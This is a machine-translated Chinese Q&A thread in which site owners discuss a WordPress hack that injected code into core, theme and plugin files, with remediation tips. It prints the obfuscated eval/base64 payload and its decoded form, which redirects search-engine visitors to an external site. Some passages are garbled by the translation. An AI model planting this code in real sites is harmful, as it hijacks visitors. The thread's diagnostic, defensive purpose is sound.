Php WordPress网站综合黑客攻击
我们为客户运行的WordPress网站已经被压缩,并试图确定他们是如何进入的。似乎他们已经将代码注入到每个WP核心文件、所有主题文件和只有少数几个选择插件文件中 他们使用的代码是:Php WordPress网站综合黑客攻击,php,wordpress,Php,Wordpress,我们为客户运行的WordPress网站已经被压缩,并试图确定他们是如何进入的。似乎他们已经将代码注入到每个WP核心文件、所有主题文件和只有少数几个选择插件文件中 他们使用的代码是: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
以前有人见过或听说过吗?有人知道这是怎么发生的吗?所有WP文件权限都设置为建议的级别
谢谢你的时间。前几天我遇到了这个问题,发现sed在清理垃圾方面非常有用。它将自己附加到每一个打开的PHP标记上,并且经常将代码放在行的末尾,因此需要仔细配置 我相信这是我使用的命令,但要小心,这毕竟是
sed
;-)
那么,下面的代码将您的用户重定向到黑名单恶意软件站点?这就是你所经历的吗
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://costabrava.bee.pl/");
exit();
}
}
}
}
您的Wordpress版本可能易受XSS攻击。这个链接讨论它。
您使用的是哪个版本?我见过的最常见的情况是,人们将所有文件和文件夹设置为777。如果必须对wp content/uploads文件夹执行此操作,请确保其中有阻止脚本执行的.htaccess指令。您的文件和文件夹应具有运行所需的最低权限(文件644,文件夹755) 您还必须阅读这些WP链接中的所有说明,以彻底清理您的安装并防止代码注入到WP核心文件或模板文件中:查看并告诉您的主机并更改所有密码。也可能更换主机;某些共享主机比其他主机更易受攻击 这并不总是有帮助,因为它取决于服务器和web主机的总体参数,在廉价的共享主机上,这些参数可能会使它们易受攻击,但您可以尝试使用这些参数来保护.htaccess和wp-config.php:
<Files .htaccess>
order deny,allow
deny from all
</Files>
<Files wp-config.php>
order allow,deny
deny from all
</Files>
命令拒绝,允许
全盘否定
命令允许,拒绝
全盘否定
在.htaccess.中,我遇到了完全相同的问题 我猜这个网站是通过这些小部件感染的,因为我使用了一个允许执行PHP代码的插件 我的最佳解决方案是:
- 消除可疑的小部件
- 查看一个受感染文件的时间和日期(我的案例:header.php)
- 清除所有受感染的文件(在我的情况下,我有站点的备份)
- 在日志文件中搜索当时的可疑IP(搜索已找到 黑名单上的IP)
- 安装一个插件以禁止可疑IP
从那一刻起,问题就消失了。我所知道的是,Anonymous上周声称,他们在3.2.1版中发现了一个漏洞。。。因此,如果3.2.1是您正在使用的版本,您可能希望更新到当前版本(3.3.1)…黑客尝试发生时,我正在运行3.3.1。它破坏了编辑器功能,这太糟糕了,但我同意这是防止被黑客攻击的唯一方法。我还可以指出,这不是服务器上唯一的站点,作为1&1共享托管帐户,整个托管帐户中的每个php文件都被此代码“感染”。这是3.3.1。共享主机帐户上的所有其他站点也已被压缩,包括Magento安装。这将是一个有趣的下午!我已经尝试过了,它删除了代码,但破坏了我的WP安装的其余部分:(T_ELSE和SWITCHHi上有解析错误。可以使正则表达式更具体,以便它只针对正确的字符串-可能在第一个括号后插入“base64”再试一次?
<Files .htaccess>
order deny,allow
deny from all
</Files>
<Files wp-config.php>
order allow,deny
deny from all
</Files>